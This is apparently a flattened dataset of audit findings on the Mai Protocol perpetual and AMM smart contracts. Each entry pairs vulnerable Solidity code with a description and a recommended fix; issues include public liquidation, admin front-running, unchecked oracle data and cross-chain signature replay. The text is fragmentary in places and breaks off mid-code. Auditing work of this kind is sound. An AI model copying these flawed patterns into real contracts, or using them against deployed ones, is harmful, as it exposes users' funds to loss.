For example, the insurance fund withdrawal and deposit are not tested for collateral that specifies a precision that is not 18. The test-cases falsely assume that the input to `withdrawFromInsuranceFund` is a WAD value, while it is taking the collateral's `rawAmount` which is then converted to a WAD number.\\ncode/test/test_perpetual.js:L471-L473\\n```\\nawait perpetual.withdrawFromInsuranceFund(toWad(10.111));\\nfund = await perpetual.insuranceFundBalance();\\nassert.equal(fund.toString(), 0);\\n```\\nчCheck that `require(wadAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");`, add a test-suite testing the insurance fund with collaterals with different precision and update existing tests that properly provide the expected input to `withdraFromInsurance`.чч```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, \"invalid amount\");\\n require(insuranceFundBalance > 0, \"insufficient funds\");\\n require(rawAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, \"negtive insurance fund\");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n -Perpetual - liquidateFrom should not have public visibility Pendingчhighч`Perpetual.liquidate` is used to liquidate an account that is “unsafe,” determined by the relative sizes of `marginBalanceWithPrice` and maintenanceMarginWithPrice:\\n```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n\\n`Perpetual.liquidate` allows the caller to assume the liquidated account's position, as well as a small amount of “penalty collateral.” The 
steps to liquidate are, roughly:\\nClose the liquidated account's position\\nPerform a trade on the liquidated assets with the liquidator acting as counter-party\\nGrant the liquidator a portion of the liquidated assets as a reward. An additional portion is added to the insurance fund.\\nHandle any losses\\nWe found several issues in Perpetual.liquidate:\\n`liquidateFrom` has `public` visibility:\\n```\\nfunction liquidateFrom(address from, address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n```\\n\\nGiven that `liquidate` only calls `liquidateFrom` after checking the current contract's status, this oversight allows anyone to call `liquidateFrom` during the `SETTLED` stage:\\n```\\nfunction liquidate(address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n require(status != LibTypes.Status.SETTLED, \"wrong perpetual status\");\\n return liquidateFrom(msg.sender, guy, maxAmount);\\n}\\n```\\n\\nAdditionally, directly calling `liquidateFrom` allows anyone to liquidate on behalf of other users, forcing other accounts to assume liquidated positions.\\nFinally, neither `liquidate` nor `liquidateFrom` check that the liquidated account and liquidator are the same. Though the liquidation accounting process is hard to follow, we believe this is unintended and could lead to large errors in internal contract accounting.чMake `liquidateFrom` an `internal` function\\nIn `liquidate` or `liquidateFrom`, check that `msg.sender != guy`чч```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n -Unpredictable behavior due to front running or general bad timing PendingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. 
This value can be set to zero, effectively enabling immediate broker changes.
Admin can front-run specific `matchOrder` calls and set arbitrary dev fees or curve parameters…\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == \"initialMarginRate\") {\\n governance.initialMarginRate = value.toUint256();\\n require(governance.initialMarginRate > 0, \"require im > 0\");\\n require(governance.initialMarginRate < 10\\*\\*18, \"require im < 1\");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, \"require mm < im\");\\n } else if (key == \"maintenanceMarginRate\") {\\n governance.maintenanceMarginRate = value.toUint256();\\n require(governance.maintenanceMarginRate > 0, \"require mm > 0\");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, \"require mm < im\");\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, \"require lpr < mm\");\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, \"require pfr < mm\");\\n } else if (key == \"liquidationPenaltyRate\") {\\n governance.liquidationPenaltyRate = value.toUint256();\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, \"require lpr < mm\");\\n } else if (key == \"penaltyFundRate\") {\\n governance.penaltyFundRate = value.toUint256();\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, \"require pfr < mm\");\\n } else if (key == \"takerDevFeeRate\") {\\n governance.takerDevFeeRate = value;\\n } else if (key == \"makerDevFeeRate\") {\\n governance.makerDevFeeRate = value;\\n } else if (key == \"lotSize\") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n \"require tls % ls == 0\"\\n );\\n governance.lotSize = value.toUint256();\\n } else if (key == \"tradingLotSize\") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, \"require tls % ls == 0\");\\n governance.tradingLotSize = value.toUint256();\\n } 
else if (key == \"longSocialLossPerContracts\") {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n socialLossPerContracts[uint256(LibTypes.Side.LONG)] = value;\\n } else if (key == \"shortSocialLossPerContracts\") {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n socialLossPerContracts[uint256(LibTypes.Side.SHORT)] = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n\\nAdmin can set `devAddress` or even update to a new `amm` and `globalConfig`\\n```\\nfunction setGovernanceAddress(bytes32 key, address value) public onlyWhitelistAdmin {\\n require(value != address(0x0), \"invalid address\");\\n if (key == \"dev\") {\\n devAddress = value;\\n } else if (key == \"amm\") {\\n amm = IAMM(value);\\n } else if (key == \"globalConfig\") {\\n globalConfig = IGlobalConfig(value);\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceAddress(key, value);\\n}\\n```\\n\\n`AMMGovernance`\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == \"poolFeeRate\") {\\n governance.poolFeeRate = value.toUint256();\\n } else if (key == \"poolDevFeeRate\") {\\n governance.poolDevFeeRate = value.toUint256();\\n } else if (key == \"emaAlpha\") {\\n require(value > 0, \"alpha should be > 0\");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n } else if (key == \"updatePremiumPrize\") {\\n governance.updatePremiumPrize = value.toUint256();\\n } else if (key == \"markPremiumLimit\") {\\n governance.markPremiumLimit = value;\\n } else if (key == \"fundingDampener\") {\\n governance.fundingDampener = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is 
Sane parameter bounds should be enforced (e.g. at a minimum, disallow a block delay of zero).
Enforce safe defaults when deploying contracts.\\nEnsure `emaAlpha` is `0 < value < 1 WAD`чч```\\n} else if (key == \"emaAlpha\") {\\n require(value > 0, \"alpha should be > 0\");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n -Exchange - insufficient input validation in matchOrders Pendingчmediumч`matchOrders` does not check that that the sender has provided the same number of `amounts` as `makerOrderParams`. When fewer `amounts` exist than `makerOrderParams`, the method will revert because of an out-of-bounds array access. When fewer `makerOrderParams` exist than `amounts`, the method will succeed, and the additional values in `amounts` will be ignored.\\nAdditionally, the method allows the sender to provide no `makerOrderParams` at all, resulting in no state changes.\\n`matchOrders` also does not reject trades with an amount set to zero. Such orders should be rejected because they do not comply with the minimum `tradingLotSize` configured for the system. As a side-effect, events may be emitted for zero-amount trades and unexpected state changes may occur.\\n```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n\\n```\\nfunction matchOrderWithAMM(LibOrder.OrderParam memory takerOrderParam, address \\_perpetual, uint256 amount) public {\\n```\\nчResolution\\nThis issue was addressed by following the recommendation to verify that `amounts.length > 0 && makerOrderParams.length == amounts.length`. However, the code does not abort if one of the `amounts` is zero which should never happen and therefore raise an exception due to it likely being an erroneous call. 
Additionally, the method now enforces that only a broker can interact with the interface.\\nRequire `makerOrderParams.length > 0 && amounts.length == makerOrderParams.length`\\nRequire that `amount` or any of the `amounts[i]` provided to `matchOrders` is `>=tradingLotSize`.чч```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n -AMM - Liquidity provider may lose up to lotSize when removing liquidity AcknowledgedчmediumчWhen removing liquidity, the amount of collateral received is calculated from the `shareAmount` (ShareToken) of the liquidity provider. The liquidity removal process registers a trade on the amount, with the liquidity provider and `AMM` taking opposite sides. Because trading only accepts multiple of the `lotSize`, the leftover is discarded. The amount discarded may be up to `lotSize - 1`.\\nThe expectation is that this value should not be too high, but as `lotSize` can be set to arbitrary values by an admin, it is possible that this step discards significant value. 
Additionally, see issue 6.6 for how this can be exploited by an admin.\\nNote that similar behavior is present in `Perpetual.liquidateFrom`, where the `liquidatableAmount` calculated undergoes a similar modulo operation:\\n```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n\\n`lotSize` can arbitrarily be set up to `pos_int256_max` as long as `tradingLotSize % `lotSize` == 0`\\n```\\n} else if (key == \"lotSize\") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n \"require tls % ls == 0\"\\n );\\n governance.lotSize = value.toUint256();\\n} else if (key == \"tradingLotSize\") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, \"require tls % ls == 0\");\\n governance.tradingLotSize = value.toUint256();\\n```\\n\\n`amount` is derived from `shareAmount` rounded down to the next multiple of the `lotSize`. The leftover is discarded.\\n```\\nuint256 amount = shareAmount.wmul(oldPoolPositionSize).wdiv(shareToken.totalSupply());\\namount = amount.sub(amount.mod(perpetualProxy.lotSize()));\\n\\nperpetualProxy.transferBalanceOut(trader, price.wmul(amount).mul(2));\\nburnShareTokenFrom(trader, shareAmount);\\nuint256 opened = perpetualProxy.trade(trader, LibTypes.Side.LONG, price, amount);\\n```\\nчEnsure that documentation makes users aware of the fact that they may lose up to `lotsize-1` in value.\\nAlternatively, track accrued value and permit trades on values that exceed `lotSize`. 
Note that this may add significant complexity.\\nEnsure that similar system behavior, like the `liquidatableAmount` calculated in `Perpetual.liquidateFrom`, is also documented and communicated clearly to users.чч```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n -Oracle - Unchecked oracle response timestamp and integer over/underflowчmediumчThe external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations of the AMM. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nEnsuring that unexpected oracle return values are properly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe `ChainlinkAdapter` and `InversedChainlinkAdapter` take the oracle's (int256) `latestAnswer` and convert the result using `chainlinkDecimalsAdapter`. 
This arithmetic operation can underflow/overflow if the Oracle provides a large enough answer:\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = ONE.wdiv(feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\nThe oracle provides a timestamp for the `latestAnswer` that is not validated and may lead to old oracle timestamps being accepted (e.g. caused by congestion on the blockchain or a directed censorship attack).\\n```\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\nчUse `SafeMath` for mathematical computations\\nVerify `latestAnswer` is within valid bounds (!=0)\\nVerify `latestTimestamp` is within accepted bounds (not in the future, was updated within a reasonable amount of time)\\nDeduplicate code by combining both Adapters into one as the only difference is that the `InversedChainlinkAdapter` returns `ONE.wdiv(price)`.чч```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n -Perpetual - Administrators can put the system into emergency mode indefinitely PendingчmediumчThere is no limitation on how long an 
administrator can put the `Perpetual` contract into emergency mode. Users cannot trade or withdraw funds in emergency mode and are effectively locked out until the admin chooses to put the contract in `SETTLED` mode.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n\\n```\\nfunction endGlobalSettlement() public onlyWhitelistAdmin {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n\\n address guy = address(amm.perpetualProxy());\\n settleFor(guy);\\n status = LibTypes.Status.SETTLED;\\n\\n emit EndGlobalSettlement();\\n}\\n```\\nчResolution\\nThe client provided the following statement addressing the issue:\\nIt should be solved by voting. Moreover, we add two roles who is able to disable withdrawing /pause the system.\\nThe duration of the emergency phase is still unrestricted.\\nSet a time-lock when entering emergency mode that allows anyone to set the system to `SETTLED` after a fixed amount of time.чч```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n -Signed data may be usable cross-chainчmediumчSigned order data may be re-usable cross-chain as the chain-id is not explicitly part of the signed data.\\nIt is also recommended to further harden the signature verification and validate that `v` and `s` are within expected bounds. 
`ecrecover()` returns `0x0` to indicate an error condition, therefore, a `signerAddress` or `recovered` address of `0x0` should explicitly be disallowed.\\nThe signed order data currently includes the EIP712 Domain Name `Mai Protocol` and the following information:\\n```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n\\nSignature verification:\\n```\\nfunction isValidSignature(OrderSignature memory signature, bytes32 hash, address signerAddress)\\n internal\\n pure\\n returns (bool)\\n{\\n uint8 method = uint8(signature.config[1]);\\n address recovered;\\n uint8 v = uint8(signature.config[0]);\\n\\n if (method == uint8(SignatureMethod.ETH\\_SIGN)) {\\n recovered = ecrecover(\\n keccak256(abi.encodePacked(\"\\x19Ethereum Signed Message:\\n32\", hash)),\\n v,\\n signature.r,\\n signature.s\\n );\\n } else if (method == uint8(SignatureMethod.EIP712)) {\\n recovered = ecrecover(hash, v, signature.r, signature.s);\\n } else {\\n revert(\"invalid sign method\");\\n }\\n\\n return 
signerAddress == recovered;\\n}\\n```\\nчInclude the `chain-id` in the signature to avoid cross-chain validity of signatures\\nverify `s` is within valid bounds to avoid signature malleability\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n revert(\"ECDSA: invalid signature 's' value\");\\n }\\n```\\n\\nverify `v` is within valid bounds\\n```\\nif (v != 27 && v != 28) {\\n revert(\"ECDSA: invalid signature 'v' value\");\\n}\\n```\\n\\nreturn invalid if the result of `ecrecover()` is `0x0`чч```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n -Exchange - validateOrderParam does not check against SUPPORTED_ORDER_VERSIONчmediumч`validateOrderParam` verifies the signature and version of a provided order. 
Instead of checking against the contract constant `SUPPORTED_ORDER_VERSION` it, however, checks against a hardcoded version `2` in the method itself.\\nThis might be a problem if `SUPPORTED_ORDER_VERSION` is seen as the configuration parameter for the allowed version. Changing it would not change the allowed order version for `validateOrderParam` as this constant literal is never used.\\nAt the time of this audit, however, the `SUPPORTED_ORDER_VERSION` value equals the hardcoded value in the `validateOrderParam` method.\\n```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, \"invalid broker\");\\n require(orderParam.getOrderVersion() == 2, \"unsupported version\");\\n require(orderParam.getExpiredAt() >= block.timestamp, \"order expired\");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), \"invalid signature\");\\n require(filled[orderHash] < orderParam.amount, \"fullfilled order\");\\n\\n return orderHash;\\n}\\n```\\nчCheck against `SUPPORTED_ORDER_VERSION` instead of the hardcoded value `2`.чч```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, \"invalid broker\");\\n require(orderParam.getOrderVersion() == 2, \"unsupported version\");\\n require(orderParam.getExpiredAt() >= block.timestamp, \"order expired\");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), \"invalid signature\");\\n require(filled[orderHash] < orderParam.amount, \"fullfilled order\");\\n\\n return 
orderHash;\\n}\\n```\\n -LibMathSigned - wpowi returns an invalid result for a negative exponent Pendingчmediumч`LibMathSigned.wpowi(x,n)` calculates Wad value `x` (base) to the power of `n` (exponent). The exponent is declared as a signed int, however, the method returns wrong results when calculating `x ^(-n)`.\\nThe comment for the `wpowi` method suggests that `n` is a normal integer instead of a Wad-denominated value. This, however, is not being enforced.\\n`LibMathSigned.wpowi(8000000000000000000, 2) = 64000000000000000000`\\n(wrong) `LibMathSigned.wpowi(8000000000000000000, -2) = 64000000000000000000`\\n```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\nчMake `wpowi` support negative exponents or use the proper type for `n` (uint) and reject negative values.\\nEnforce that the exponent bounds are within sane ranges and less than a Wad to detect potential misuse where someone accidentally provides a Wad value as `n`.\\nAdd positive and negative unit-tests to fully cover this functionality.чч```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? 
It should be noted, that `ABIEncoderV2` was subject to multiple bug-fixes up until the latest 0.6.x version and contracts compiled with earlier versions are - for example - susceptible to the following issues:
Avoid re-declaring the same constants in multiple source-units (and unit-test cases) as this will be hard to maintain.\\n```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\nчRemove unused code. Import the value from a shared resource. E.g.ONE_WAD is declared multiple times in `LibMathSigned`, `LibMathUnsigned`, `AMM`, hardcoded in checks in `PerpetualGovernance.setGovernanceParameter`, `AMMGovernance.setGovernanceParameter`.чч```\\nuint256 private constant ONE\\_WAD\\_U = 10\\*\\*18;\\n```\\n -Perpetual - Variable shadowing in constructorчlowч`Perpetual` inherits from `PerpetualGovernance` and `Collateral`, which declare state variables that are shadowed in the `Perpetual` constructor.\\nLocal constructor argument shadows `PerpetualGovernance.globalConfig`, `PerpetualGovernance.devAddress`, `Collateral.collateral`\\nNote: Confusing name: `Collateral` is an inherited contract and a state variable.\\n```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(\"globalConfig\", globalConfig);\\n setGovernanceAddress(\"dev\", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\nчRename the parameter or state variable.чч```\\nconstructor(address globalConfig, address devAddress, address collateral, uint256 collateralDecimals)\\n public\\n Position(collateral, collateralDecimals)\\n{\\n setGovernanceAddress(\"globalConfig\", globalConfig);\\n setGovernanceAddress(\"dev\", devAddress);\\n emit CreatePerpetual();\\n}\\n```\\n -Perpetual - The specified decimals for the collateral may not reflect the token's actual decimals AcknowledgedчlowчWhen initializing the `Perpetual` contract, the deployer can decide to use either `ETH`, or an ERC20-compliant collateral. 
In the latter case, the deployer must provide a nonzero address for the token, as well as the number of `decimals` used by the token:\\n```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, \"decimals out of range\");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), \"invalid decimals\");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n\\nThe provided `decimals` value is not checked for validity and can differ from the actual token's `decimals`.чEnsure to establish documentation that makes users aware of the fact that the decimals configured are not enforced to match the actual tokens decimals. This is to allow users to audit the system configuration and decide whether they want to participate in it.чч```\\nconstructor(address \\_collateral, uint256 decimals) public {\\n require(decimals <= MAX\\_DECIMALS, \"decimals out of range\");\\n require(\\_collateral != address(0x0) || (\\_collateral == address(0x0) && decimals == 18), \"invalid decimals\");\\n\\n collateral = \\_collateral;\\n scaler = (decimals == MAX\\_DECIMALS ? 1 : 10\\*\\*(MAX\\_DECIMALS - decimals)).toInt256();\\n}\\n```\\n -AMM - Unchecked return value in ShareToken.mint Pendingчlowч`ShareToken` is an extension of the Openzeppelin ERC20Mintable pattern which exposes a method called `mint()` that allows accounts owning the minter role to mint new tokens. The return value of `ShareToken.mint()` is not checked.\\nSince the ERC20 standard does not define whether this method should return a value or revert it may be problematic to assume that all tokens revert. 
If, for example, an implementation is used that does not revert on error but returns a boolean error indicator instead the caller might falsely continue without the token minted.\\nWe would like to note that the functionality is intended to be used with the provided `ShareToken` and therefore the contract is safe to use assuming `ERC20Mintable.mint` reverts on error. The issue arises if the system is used with a different `ShareToken` implementation that is not implemented in the same way.\\nOpenzeppelin implementation\\n```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n\\nCall with unchecked return value\\n```\\nfunction mintShareTokenTo(address guy, uint256 amount) internal {\\n shareToken.mint(guy, amount);\\n}\\n```\\nчConsider wrapping the `mint` statement in a `require` clause, however, this way only tokens that are returning a boolean error indicator are supported. Document the specification requirements for the `ShareToken` and clearly state if the token is expected to revert or return an error indicator.\\nIt should also be documented that the Token exposes a `burn` method that does not adhere to the Openzeppelin `ERC20Burnable` implementation. The `ERC20Burnable` import is unused as noted in issue 6.23.чч```\\nfunction mint(address account, uint256 amount) public onlyMinter returns (bool) {\\n \\_mint(account, amount);\\n return true;\\n}\\n```\\n -Perpetual - beginGlobalSettlement can be called multiple times AcknowledgedчlowчThe system can be put into emergency mode by an admin calling `beginGlobalSettlement` and providing a fixed `settlementPrice`. The method can be invoked even when the contract is already in `SETTLING` (emergency) mode, allowing an admin to selectively adjust the settlement price again. This does not seem to be the intended behavior as calling the method again re-sets the status to `SETTLING`. 
Furthermore, it may affect users' behavior during the `SETTLING` phase.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\nчEmergency mode should only be allowed to be set onceчч```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, \"already settled\");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n -Exchange - OrderStatus is never usedчlowчThe enum `OrderStatus` is declared but never used.\\n```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\nчResolution\\nThis issue was resolved by removing the unused code.\\nRemove unused code.чч```\\nenum OrderStatus {EXPIRED, CANCELLED, FILLABLE, FULLY\\_FILLED}\\n```\\n -LibMath - Inaccurate declaration of _UINT256_MAXчlowч`LibMathUnsigned` declares `_UINT256_MAX` as `2^255-1` while this value actually represents `_INT256_MAX`. This appears to just be a naming issue.\\n(UINT256_MAX/2-1 => pos INT256_MAX; 2**256/2-1==2**255-1)\\n```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\nчRename `_UINT256_MAX` to `_INT256MAX` or `_SIGNED_INT256MAX`.чч```\\nlibrary LibMathUnsigned {\\n uint256 private constant \\_WAD = 10\\*\\*18;\\n uint256 private constant \\_UINT256\\_MAX = 2\\*\\*255 - 1;\\n```\\n -LibMath - inconsistent assertion text and improve representation of literals with many digits AcknowledgedчlowчThe assertion below states that `logE only accepts v <= 1e22 * 1e18` while the argument name is `x`. 
In addition to that we suggest representing large literals in scientific notation.\\n```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, \"logE of negative number\");\\n require(x <= 10000000000000000000000000000000000000000, \"logE only accepts v <= 1e22 \\* 1e18\"); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\nчUpdate the inconsistent assertion text `v` -> `x` and represent large literals in scientific notation as they are otherwise difficult to read and review.чч```\\nfunction wln(int256 x) internal pure returns (int256) {\\n require(x > 0, \"logE of negative number\");\\n require(x <= 10000000000000000000000000000000000000000, \"logE only accepts v <= 1e22 \\* 1e18\"); // in order to prevent using safe-math\\n int256 r = 0;\\n uint8 extra\\_digits = longer\\_digits - fixed\\_digits;\\n```\\n -LibMath - roundHalfUp returns unfinished resultчlowчThe method `LibMathSigned.roundHalfUp(int `x`, int y)` returns the value `x` rounded up to the base `y`. The method suggests that the result is the rounded value while that's not actually true. The result for a positive `x` is `x` + base/2 and `x` - base/2 for negative values. The rounding is not yet finished as this would require a final division by base `y` to manifest the rounding.\\nIt is assumed that the final rounding step is not executed for performance reasons. However, this might easily introduce errors when the caller assumes the result is rounded for base while it is not.\\n`roundHalfUp(-4700, 1000) = -5200` instead of `-5000`\\n`roundHalfUp(4700, 1000) = 5200` instead of `5000`\\n```\\n// 